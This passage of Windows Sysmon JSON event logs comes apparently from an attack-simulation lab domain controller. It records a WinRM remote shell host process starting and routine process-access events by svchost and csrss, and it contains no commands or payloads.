{41C8662E-1F63-5F25-0000-0010C3650000}\r\nParentProcessId: 612\r\nParentImage: C:\\Windows\\System32\\svchost.exe\r\nParentCommandLine: C:\\Windows\\system32\\svchost.exe -k DcomLaunch","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.788","ProcessGuid":"{41C8662E-1F8B-5F25-0000-0010E05C0400}","Image":"C:\\Windows\\System32\\winrshost.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Host Process for WinRM's Remote Shell plugin","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"winrshost.exe","CommandLine":"C:\\Windows\\system32\\WinrsHost.exe -Embedding","CurrentDirectory":"C:\\Windows\\system32\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-1F88-5F25-0000-0020B3460400}","LogonId":"0x446b3","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96","ParentProcessGuid":"{41C8662E-1F63-5F25-0000-0010C3650000}","ParentProcessId":"612","ParentImage":"C:\\Windows\\System32\\svchost.exe","ParentCommandLine":"C:\\Windows\\system32\\svchost.exe -k DcomLaunch","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2438,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.782\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F8B-5F25-0000-0010E05C0400}\r\nTargetProcessId: 4108\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.782","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F8B-5F25-0000-0010E05C0400}","TargetProcessId":"4108","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2439,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.782\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F8B-5F25-0000-0010E05C0400}\r\nTargetProcessId: 4108\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.782","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F8B-5F25-0000-0010E05C0400}","TargetProcessId":"4108","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2440,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.782\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.782","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2441,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.782\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.782","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2442,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.782\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.782","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2443,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.782\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.782","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2444,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.782\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.782","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2445,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.782\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.782","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
